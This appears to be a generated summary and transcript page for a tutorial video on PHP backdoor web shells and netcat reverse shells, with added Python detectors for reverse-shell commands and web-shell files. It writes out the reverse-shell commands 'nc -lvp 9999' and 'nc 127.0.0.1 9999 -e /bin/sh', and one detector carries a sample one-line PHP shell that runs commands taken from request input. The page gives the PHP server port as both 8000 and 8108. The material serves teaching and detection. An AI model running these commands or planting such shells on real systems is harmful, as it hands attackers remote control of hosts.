12 Backdoor & Reverse Shell

Coding Studio
28 Sept 2021 · 08:29

Summary

TLDR: This video script covers backdoors and reverse shells. It explains that a backdoor is an unauthorized access tool that bypasses authentication, and gives PHP web shells such as c99, becak, r57 and p0wny-shell as examples. It also covers reverse shells, where the attacker listens for an incoming connection from the compromised host and receives a shell on that host. Practical demonstrations on Kali Linux are included: starting a local PHP server to run the web shell, and executing commands through a reverse shell, showing how these techniques look in practice.

Takeaways

  • 🔒 The script defines a 'backdoor' as software created to access a system without authenticating.
  • 📂 It explains how an attacker uploads a backdoor file and then uses it to reach the server without going through the server's own authentication mechanism.
  • 🌐 Many backdoors are available online, varying by programming language; the PHP examples given are c99, becak, r57, and p0wny-shell.
  • 💻 The script covers the 'reverse shell', in which the attacker listens for an incoming connection from the host in order to obtain a shell on it.
  • 📝 It describes simulating and running the PHP backdoor p0wny-shell on Kali Linux.
  • 📁 The shell can be prepared locally or downloaded from the project's GitHub page.
  • 🖥️ It demonstrates running a local PHP server from the command line so the backdoor can be opened in a browser.
  • 🛠️ The script runs various commands inside the web shell to show what the backdoor can do.
  • 🔄 The 'reverse shell' concept is demonstrated: the attacker opens a listening port and the host connects to it, giving the attacker a shell on the host.
  • 🔑 It explains the 'nc' command and the parameters used to create the listener and to establish the reverse shell.
  • 📍 The script concludes with an interactive demonstration of connecting from the host to the attacker and verifying the shell by issuing commands such as 'pwd'.

Q & A

  • What is a backdoor in the context of the script?

    - A backdoor is a software tool created to access a system without having to authenticate. An attacker uploads the backdoor file once and can later reach the server through it, bypassing the server's own authentication mechanism.

  • What is the purpose of a backdoor in cybersecurity?

    - The purpose of a backdoor is to provide unauthorized access to a system, often for malicious activities such as data theft or system control.

  • Can you name some examples of backdoors in PHP programming mentioned in the script?

    - The script mentions c99, becak, r57, and p0wny-shell as examples of PHP backdoors.

  • What is the difference between a backdoor and a regular system access method?

    - A backdoor bypasses the standard authentication process, whereas regular system access methods require credentials such as a username and password.

  • What is a reverse shell in the context of the script?

    - A reverse shell, in the script's context, is a shell obtained over a connection that the host opens to the attacker: the attacker waits in a listening state, the host connects out to it, and the attacker receives a shell running on the host.

  • What is the significance of the term 'listening' in the context of reverse shells?

    - 'Listening' is the state in which the attacker's machine waits for an incoming connection. The host connects to that listening port, and the shell attached to the connection runs on the host.

  • What is the purpose of simulating and running a backdoor like p0wny-shell in the script?

    - Simulating and running a backdoor like p0wny-shell demonstrates how an attacker can gain unauthorized access to a system, which is crucial for understanding and defending against such attacks.

  • How does one create a local PHP server as mentioned in the script?

    - A local PHP server is started with PHP's built-in web server, 'php -S localhost:8108', which serves the current directory on localhost at port 8108.

  • What is the role of the 'nc' command in the script's context?

    - The 'nc' (netcat) command is used on the attacker's machine to open a listening port, and on the host to connect to that port and attach a shell to the connection.

  • What does the '-e' option in the 'nc' command do in the script?

    - The '-e' option tells 'nc' which program to run once the connection is made; in the script this is /bin/sh on the host, so the host's shell is bound to the connection and controlled from the attacker's terminal.

  • How does the script demonstrate the connection between the attacker and the host?

    - The script uses two terminals, one representing the attacker and the other the host, and shows the process of establishing a shell connection using the 'nc' command.

Outlines

00:00

🔒 Introduction to Backdoors and Reverse Shells

This paragraph introduces backdoors: unauthorized access tools that bypass authentication mechanisms. It explains how an attacker uploads a backdoor file and later accesses the system without going through the server's authentication process. It also mentions the many backdoors available online, such as the PHP web shells c99, becak, r57, and p0wny-shell, and shows p0wny-shell as an example of a PHP shell that runs system commands. It then introduces the 'reverse shell', in which the attacker listens for an incoming connection from the host in order to gain a shell on it. The speaker sets up and runs the p0wny-shell backdoor on Kali Linux and also performs a reverse shell. The paragraph concludes with instructions for simulating and executing the backdoor locally by starting a PHP server and opening the shell in a browser.

05:00

🔄 Simulating Network Connections for the Reverse Shell

The second paragraph walks through simulating the reverse shell over the loopback interface. The host's terminal changes directory to the desktop so that the attacker's and host's environments can be told apart. The speaker explains the 'nc' parameters used: '-l' for listen mode, '-v' for verbose output, and '-p' to set the port. The attacker starts the listener on port 9999; from the host's terminal, the speaker connects to it using the local IP address 127.0.0.1 (or localhost) and that port, adding '-e' so that /bin/sh runs on the host once the connection is established. The paragraph concludes by verifying the connection with 'pwd', which shows the host's desktop directory and confirms that the attacker's terminal now drives a shell on the host.
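The outline above describes the attacker-side listener ('nc -lvp 9999') and the host-side connect-back ('nc 127.0.0.1 9999 -e /bin/sh'). From a detection standpoint, both commands are unusual on a server and can be spotted in process-execution telemetry. The following is an added example, not code from the video or from the netcat project: a small Python classifier that tokenises netcat command lines, expands clustered flags such as '-lvp', and labels them as a listener, an exec relay, or a reverse shell. The log format (constructed 'ts host=... user=... cmd="..."' lines) and the host/user names are assumptions for the demo; adapt the parser to whatever your auditd, EDR, or shell-history source emits.

```python
import re
import shlex
from dataclasses import dataclass

# Names under which netcat typically appears in process telemetry.
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
# Short options that hand a program to the remote peer:
# nc.traditional -e / -c, ncat -e / -c.
EXEC_SHORT = {"e", "c"}
# Long forms used by ncat.
EXEC_LONG = {"--exec", "--sh-exec"}
# Shell binaries that, when given to -e/--exec, yield an interactive shell.
SHELL_RE = re.compile(
    r"(?:^|/)(?:sh|bash|dash|zsh|ksh|cmd(?:\.exe)?|powershell(?:\.exe)?)(?:\s|$)", re.I
)

@dataclass
class Finding:
    line_no: int
    host: str
    user: str
    kind: str
    cmdline: str

def _short_flags(args):
    """Expand clustered single-dash options: '-lvp' -> {'l', 'v', 'p'}."""
    flags = set()
    for tok in args:
        if tok.startswith("-") and not tok.startswith("--") and len(tok) > 1:
            flags.update(tok[1:])
    return flags

def classify(cmdline: str):
    """Return 'reverse-shell', 'exec-relay', 'listener', or None for a command line."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: not something we can parse
        return None
    if not tokens:
        return None
    prog = tokens[0].rsplit("/", 1)[-1]          # strip any directory prefix
    if prog not in NETCAT_NAMES:
        return None
    args = tokens[1:]
    flags = _short_flags(args)
    longs = {a.split("=", 1)[0] for a in args if a.startswith("--")}
    has_exec = bool(flags & EXEC_SHORT) or bool(longs & EXEC_LONG)
    # -c / --sh-exec always run the argument through /bin/sh, so they count as a shell.
    spawns_shell = "c" in flags or "--sh-exec" in longs or any(SHELL_RE.search(a) for a in args)
    if has_exec and spawns_shell:
        return "reverse-shell"   # the peer gets a shell bound to the socket
    if has_exec:
        return "exec-relay"      # some other program is bound to the socket
    if "l" in flags or "--listen" in longs:
        return "listener"        # waiting for an inbound connection
    return None

# Constructed telemetry lines, not real logs; mirrors the tutorial's loopback demo.
SAMPLE_LOG = """\
2021-09-28T08:29:01 host=kali-attacker user=student cmd="nc -lvp 9999"
2021-09-28T08:29:07 host=kali-host user=student cmd="cd Desktop"
2021-09-28T08:29:12 host=kali-host user=student cmd="nc 127.0.0.1 9999 -e /bin/sh"
2021-09-28T08:29:20 host=kali-host user=student cmd="nc -zv 127.0.0.1 8000"
2021-09-28T08:29:25 host=kali-host user=www-data cmd="php -S localhost:8000"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>.*)"$')

def scan(log_text: str):
    """Run classify() over every parsable line and collect the suspicious ones."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue
        kind = classify(m["cmd"])
        if kind:
            findings.append(Finding(n, m["host"], m["user"], kind, m["cmd"]))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.kind:<13} {f.user}@{f.host}: {f.cmdline}")
```

The port scan ('-zv') and the PHP server are left alone, while the listener and the connect-back with '-e /bin/sh' are reported. A listener alone is only medium confidence (admins use 'nc -l' for ad hoc file transfers), whereas '-e' with a shell argument is rarely legitimate on a production host.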

Keywords

💡Backdoor

A backdoor refers to a secret or unauthorized access point to a computer system that bypasses normal authentication procedures. In the video's context, attackers use backdoors to gain unauthorized access to servers without the need for legitimate credentials. The script mentions the uploading of a backdoor file and the subsequent access to the server through this backdoor, illustrating the theme of unauthorized access and cybersecurity.

💡Authentication

Authentication is the process of verifying the identity of a user, device, or system as a prerequisite to allowing access to resources. The video discusses how backdoors allow bypassing this process, which is a critical aspect of maintaining system security. The script implies that a backdoor negates the need for authentication, thus compromising the security measures in place.

💡PHP

PHP is a server-side scripting language used for creating dynamic web pages. The script names PHP as the language of several backdoors, such as 'c99', 'becak', 'r57', and 'p0wny-shell', indicating that backdoors exist for many programming languages and that secure coding and upload handling are needed to keep such files off a server.

💡Backdoor Shell

A backdoor shell is a type of backdoor that provides a command-line interface to an attacker, allowing them to execute system commands remotely. The video's discussion of PHP backdoors and their ability to run system commands exemplifies the functionality of a backdoor shell in providing unauthorized control over a system.
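The PHP backdoor shells named on this page share a structure: a request parameter is fed to a command-execution function (system, shell_exec, passthru, and so on), or decoded and passed to eval. That structure is also what a defender can look for in uploaded files. The following is an added example, not code from p0wny-shell, c99 or any other project: a heuristic Python scanner that splits a PHP source into statements and flags those where request input reaches a command-execution or eval-style call. The four PHP snippets are constructed test inputs, including a one-line shell of the kind the video discusses and a benign script that also reads request input.

```python
import re

# PHP functions that run OS commands.
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "pcntl_exec")
# Functions that execute PHP code built at runtime.
EVAL_LIKE = ("eval", "assert", "create_function")
# Decoders commonly wrapped around eval() to hide the payload.
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13", "hex2bin")
# Sources of attacker-controlled input.
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES)\b|\$GLOBALS\[|php://input")

SEVERITY = {"request-to-command": 10, "dynamic-code": 8, "command-execution": 3}

def _calls(stmt, names):
    """Names from `names` that are called in this statement (word-bounded, so
    'exec(' does not match inside 'shell_exec(')."""
    return [n for n in names if re.search(r"\b" + re.escape(n) + r"\s*\(", stmt)]

def scan_php(source: str):
    """Return {'score', 'verdict', 'findings'} for one PHP source text."""
    findings = []
    # Crude statement split on ';' and '?>'; adequate for tutorial-style shells.
    for stmt in re.split(r";|\?>", source):
        s = stmt.strip()
        if not s:
            continue
        execs = _calls(s, EXEC_FUNCS)
        evals = _calls(s, EVAL_LIKE)
        decoders = _calls(s, DECODERS)
        tainted = bool(REQUEST_INPUT.search(s))
        if execs and tainted:
            findings.append(("request-to-command", execs, s))
        elif execs:
            findings.append(("command-execution", execs, s))
        if evals and (tainted or decoders):
            findings.append(("dynamic-code", evals + decoders, s))
    score = max((SEVERITY[kind] for kind, _, _ in findings), default=0)
    verdict = "likely-webshell" if score >= 8 else "review" if score > 0 else "clean"
    return {"score": score, "verdict": verdict, "findings": findings}

# Constructed samples (not taken from any real web shell or site).
BENIGN = """<?php
$name = $_GET['name'] ?? 'world';
echo 'Hello, ' . htmlspecialchars($name);
?>"""

ONE_LINE_SHELL = """<?php
if (isset($_REQUEST['cmd'])) { echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; }
?>"""

# base64 of the harmless string "echo 'hi';" - the scanner cares about the shape, not the payload.
OBFUSCATED = "<?php eval(base64_decode('ZWNobyAnaGknOw==')); ?>"

MAINTENANCE = "<?php $out = shell_exec('uptime'); echo $out; ?>"

if __name__ == "__main__":
    for label, src in [("benign", BENIGN), ("one-line shell", ONE_LINE_SHELL),
                       ("obfuscated", OBFUSCATED), ("maintenance", MAINTENANCE)]:
        r = scan_php(src)
        print(f"{label:<15} {r['verdict']:<16} score={r['score']}")
        for kind, funcs, stmt in r["findings"]:
            print(f"    {kind}: {', '.join(funcs)} in {stmt[:60]!r}")
```

The hard-coded 'uptime' call lands in 'review' rather than 'likely-webshell' because nothing attacker-controlled reaches it; that separation keeps the scanner useful on a codebase that legitimately shells out. Run it over an upload directory on a schedule, or as a pre-publish hook, and treat any 'likely-webshell' hit as an incident to investigate rather than a file to silently delete.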

💡Reverse Shell

A reverse shell, in the context of the video, is a shell that the attacker obtains by opening a listening port and waiting for the target host to connect out to it. The connection is initiated by the host, which is why it works even when the attacker cannot connect to the host directly. The script shows the attacker starting the listener and the host connecting to it with a shell attached, demonstrating the technique in action.

💡Listening

In networking, listening refers to the state where a system or service is waiting for incoming connections. The video script describes the attacker putting netcat into listening mode, which is the step that lets the host's outbound connection be accepted and the attached shell be used.

💡Kali Linux

Kali Linux is a Linux distribution designed for digital forensics and penetration testing. The script mentions using Kali Linux to simulate and run a backdoor, indicating its role as a platform for cybersecurity professionals to test and understand security vulnerabilities and exploit techniques.

💡PHP Server

A PHP server is a server configured to execute PHP scripts, allowing for the creation of dynamic web content. The video script starts PHP's built-in development server with 'php -S localhost' and a port number to serve the backdoor locally, illustrating how a web shell is hosted and tested.

💡Terminal

A terminal is an interface that allows users to interact with the operating system through a command-line interface. The script refers to opening a terminal to execute commands and run a backdoor, highlighting the terminal's role in system administration and command execution.

💡NC (Netcat)

Netcat, often referred to as 'nc', is a utility used for reading from and writing to network connections using TCP or UDP. The video script discusses using 'nc' for creating a listening connection and establishing a reverse shell, demonstrating its use in network communication and exploitation techniques.

💡Port

A port is a numerical identifier in networking used to route messages to the correct application on a server. The script mentions setting up a listening connection on a specific port (9999) and connecting to it, which is essential for establishing a reverse shell and illustrates the importance of port management in cybersecurity.

Highlights

Introduction to backdoors and their purpose in accessing systems without authentication.

Backdoors are software tools that attackers upload to a server to keep unauthorized access.

Different backdoors exist for different programming languages; the PHP examples given are c99, becak, r57, and p0wny-shell.

Explanation of how backdoors can execute system commands once uploaded.

In a reverse shell, the attacker listens for an incoming connection from the host in order to gain a shell on it.

Demonstration of setting up a local PHP server for testing backdoors.

Using the PHP built-in server command 'php -S localhost:8108' to serve the backdoor on port 8108.

Accessing the local PHP server through a web browser to view the backdoor interface.

Executing common commands through the backdoor to demonstrate its capabilities.

Simulating a scenario where an attacker uses a backdoor to gain access to a host.

Using two terminals to represent an attacker and a host for the simulation.

Running the 'nc' command to establish a reverse shell connection between the attacker and host.

Explanation of the 'nc' command parameters used for setting up the reverse shell.

Executing the reverse shell command 'nc -lvp 9999' to listen for incoming connections.

Connecting to the listening port using 'nc 127.0.0.1 9999' from the host side.

Using the '-e' parameter so that /bin/sh runs on the connected host and is attached to the connection.

Verification of successful access by checking the current directory with the 'pwd' command.

Conclusion of the session with a preview of the next video content.

Transcripts

00:03

Welcome back to this session. This time we will learn about backdoors and also reverse shells.

00:10

A backdoor is a piece of software created to access a system without having to authenticate, as in the illustration below, where the attacker uploads a backdoor file, and after that, if the attacker wants to access the server, the attacker can access it using the backdoor uploaded earlier, without having to go through the mechanism on the server side itself.

00:38

Now, depending on the programming language, there are a great many backdoors already out on the internet. For example, here are backdoor shells for the PHP programming language: there is c99, there is becak, r57, 'besok' [unclear], and also p0wny-shell.

00:58

On the right you can see an example of p0wny-shell, a shell written in PHP that can run commands through the system shell in use.

01:11

Here we will also discuss the reverse shell. A reverse shell is a shell created from a connection made by the host to the attacker, who is in the listening state, that is, the attacker is in a state where it will listen for an incoming connection, as in the illustration below. Here the host will connect to the attacker, who is in the listening state, so that the attacker later gets shell access on that host itself.

01:45

Here we will also simulate and run one of the backdoors, namely p0wny-shell, on our local Kali Linux, and also run a reverse shell using Kali Linux. But before that, we can prepare the shell ourselves, or you can download the shell directly from the following GitHub link: github.com/flozz/p0wny-shell.

02:15

Next, we drag and drop to copy it, for example, into our Kali Linux. Here I drag and drop it and place it on the desktop itself.

02:33

Now here we will try to simulate and run this p0wny-shell by right-clicking and choosing Open Terminal Here.

02:46

Here we will try to run the website locally, by creating a PHP server with the command php -S localhost:8000, meaning we want to create a PHP server on localhost with the port 8108. Open a browser first and open localhost:8000/….php, like this.

03:24

This is the appearance of p0wny-shell itself. Here we can also run various commands; for example, here I will run a common command, it will be executed and the output will be shown in this shell, as follows.

03:48

Next, here we will also try to run a reverse shell, by first opening two terminals, by pressing Ctrl+Alt+T twice. First, OK, this is for the first shell, and we press Ctrl+Alt+T again for the second shell. Here I will tidy them up first, like this.

04:25

Here we will simulate these two terminals as two different shells, where the left shell will represent the attacker and the right one will represent the host. In this simulation the attacker will create the reverse shell listener, and later the host will connect to the attacker so that the attacker gets a shell from the host. But before that, for the host itself, I will mark it here as "host", like this.

05:00

Here I will change the host's directory to the desktop directory, to distinguish the directories of the attacker, which is in the home directory, and the host, which is in the desktop directory, like this.

05:15

Here, for the attacker, we can run the command nc, or netcat, followed by -h. As for the program itself, here we can use nc, which can be read as netcat. When we press enter, here there are many parameters provided, but we will only use a few parameters for the attacker itself: there is -l, meaning listen mode, then -v, verbose, and also -p, or port. Listen itself puts the attacker in the position of listening for incoming connections later; verbose is used to display messages that would otherwise not be shown on screen; and -p, or port, sets which port we will later run the listener on.

06:21

Now here, to run the command, we can use nc -lvp 9999. What does that mean? It means we will run netcat in the listen condition, and its port is port 9999. When we press enter, here the attacker is already in the listen condition.

06:54

Next, on the host side, here we will run the command nc 127.0.0.1. Because we want to run this locally, we can use the IP 127.0.0.1, or we can use localhost, like this. Then the port we are targeting is the attacker's port, 9999, then -e /bin/sh, like this. The -e option serves to run a program after the connection is made, and /bin/sh itself is the shell that will be given to the attacker and executed on the host itself.

07:53

Here, when we press enter, the connection is created, and on the attacker side here is the shell from the host. We can prove it when we give the command pwd: here you can see the directory is the desktop directory, which we know is the directory of the host's shell. That is all for this session; see you in the next video.
